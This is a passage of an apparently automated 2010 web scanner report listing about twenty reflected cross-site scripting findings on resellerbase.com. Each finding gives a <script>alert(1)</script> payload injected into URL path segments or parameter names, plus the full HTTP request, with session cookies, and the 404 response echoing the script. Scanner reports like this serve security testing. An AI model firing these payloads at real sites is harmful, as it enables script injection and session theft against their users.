The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload c5222<a>de90256fef1 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/31/search.php?keyword=search...&Submit3=Search&opt=2c5222<a>de90256fef1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/31/camsense-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/search.php?keyword=search...&Submit3=Search&opt=2c5222<a>de90256fef1 was not found on this server.</p>
...[SNIP]...

2.2188. http://www.resellerbase.com/detail/31/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 521cd<script>alert(1)</script>cee51276d4a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail521cd<script>alert(1)</script>cee51276d4a/31/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:24 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail521cd<script>alert(1)</script>cee51276d4a/31/themes/ was not found on this server.</p>
...[SNIP]...

2.2189. http://www.resellerbase.com/detail/31/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e123b<script>alert(1)</script>79c6ad88911 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31e123b<script>alert(1)</script>79c6ad88911/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:35 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31e123b<script>alert(1)</script>79c6ad88911/themes/ was not found on this server.</p>
...[SNIP]...

2.2190. http://www.resellerbase.com/detail/31/themes/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 2fb6d<script>alert(1)</script>7fc79a2397d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes2fb6d<script>alert(1)</script>7fc79a2397d/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes2fb6d<script>alert(1)</script>7fc79a2397d/ was not found on this server.</p>
...[SNIP]...

2.2191. http://www.resellerbase.com/detail/31/themes/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d6793<script>alert(1)</script>3f42e11c27d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/?d6793<script>alert(1)</script>3f42e11c27d=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.2192. http://www.resellerbase.com/detail/31/themes/kosmos/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9bed2<script>alert(1)</script>3e464ba3e09 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail9bed2<script>alert(1)</script>3e464ba3e09/31/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail9bed2<script>alert(1)</script>3e464ba3e09/31/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2193. http://www.resellerbase.com/detail/31/themes/kosmos/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 943b1<script>alert(1)</script>feecf4c2ef5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31943b1<script>alert(1)</script>feecf4c2ef5/themes/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31943b1<script>alert(1)</script>feecf4c2ef5/themes/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2194. http://www.resellerbase.com/detail/31/themes/kosmos/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a9c21<script>alert(1)</script>1b5637141e9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themesa9c21<script>alert(1)</script>1b5637141e9/kosmos/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themesa9c21<script>alert(1)</script>1b5637141e9/kosmos/ was not found on this server.</p>
...[SNIP]...

2.2195. http://www.resellerbase.com/detail/31/themes/kosmos/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 20a72<script>alert(1)</script>2cf13fe470b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos20a72<script>alert(1)</script>2cf13fe470b/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos20a72<script>alert(1)</script>2cf13fe470b/ was not found on this server.</p>
...[SNIP]...

2.2196. http://www.resellerbase.com/detail/31/themes/kosmos/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 46d03<script>alert(1)</script>32dd905b62f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/?46d03<script>alert(1)</script>32dd905b62f=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

2.2197. http://www.resellerbase.com/detail/31/themes/kosmos/images/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d9b7d<script>alert(1)</script>e0eac59b19f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild9b7d<script>alert(1)</script>e0eac59b19f/31/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:31 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild9b7d<script>alert(1)</script>e0eac59b19f/31/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2198. http://www.resellerbase.com/detail/31/themes/kosmos/images/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 538c3<script>alert(1)</script>8806a903171 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31538c3<script>alert(1)</script>8806a903171/themes/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:47 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31538c3<script>alert(1)</script>8806a903171/themes/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2199. http://www.resellerbase.com/detail/31/themes/kosmos/images/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c8658<script>alert(1)</script>312ee47aadc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themesc8658<script>alert(1)</script>312ee47aadc/kosmos/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themesc8658<script>alert(1)</script>312ee47aadc/kosmos/images/ was not found on this server.</p>
...[SNIP]...

2.2200. http://www.resellerbase.com/detail/31/themes/kosmos/images/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 79685<script>alert(1)</script>619ecbc60cf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos79685<script>alert(1)</script>619ecbc60cf/images/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos79685<script>alert(1)</script>619ecbc60cf/images/ was not found on this server.</p>
...[SNIP]...

2.2201. http://www.resellerbase.com/detail/31/themes/kosmos/images/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 94aa8<script>alert(1)</script>e5c3b4cb577 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/images94aa8<script>alert(1)</script>e5c3b4cb577/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images94aa8<script>alert(1)</script>e5c3b4cb577/ was not found on this server.</p>
...[SNIP]...

2.2202. http://www.resellerbase.com/detail/31/themes/kosmos/images/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload e8f24<script>alert(1)</script>58544343a55 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/images/?e8f24<script>alert(1)</script>58544343a55=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos/images/?e8f24<script>alert(1)</script>58544343a55=1 was not found on this server.</p>
...[SNIP]...

2.2203. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7ff57<script>alert(1)</script>0a38671f14e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail7ff57<script>alert(1)</script>0a38671f14e/31/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail7ff57<script>alert(1)</script>0a38671f14e/31/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2204. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e9296<script>alert(1)</script>46c31ef26c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31e9296<script>alert(1)</script>46c31ef26c8/themes/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:08:51 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31e9296<script>alert(1)</script>46c31ef26c8/themes/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2205. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/ [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 4e7b0<script>alert(1)</script>a3919e4b364 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes4e7b0<script>alert(1)</script>a3919e4b364/kosmos/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes4e7b0<script>alert(1)</script>a3919e4b364/kosmos/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2206. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/ [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 5a578<script>alert(1)</script>c65aa8cc7d2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos5a578<script>alert(1)</script>c65aa8cc7d2/images/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/31/themes/kosmos5a578<script>alert(1)</script>c65aa8cc7d2/images/rating/ was not found on this server.</p>
...[SNIP]...

2.2207. http://www.resellerbase.com/detail/31/themes/kosmos/images/rating/ [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/31/themes/kosmos/images/rating/

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload bacf4<script>alert(1)</script>6d6060b3a3f was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/31/themes/kosmos/imagesbacf4<script>alert(1)</script>6d6060b3a3f/rating/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:20 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
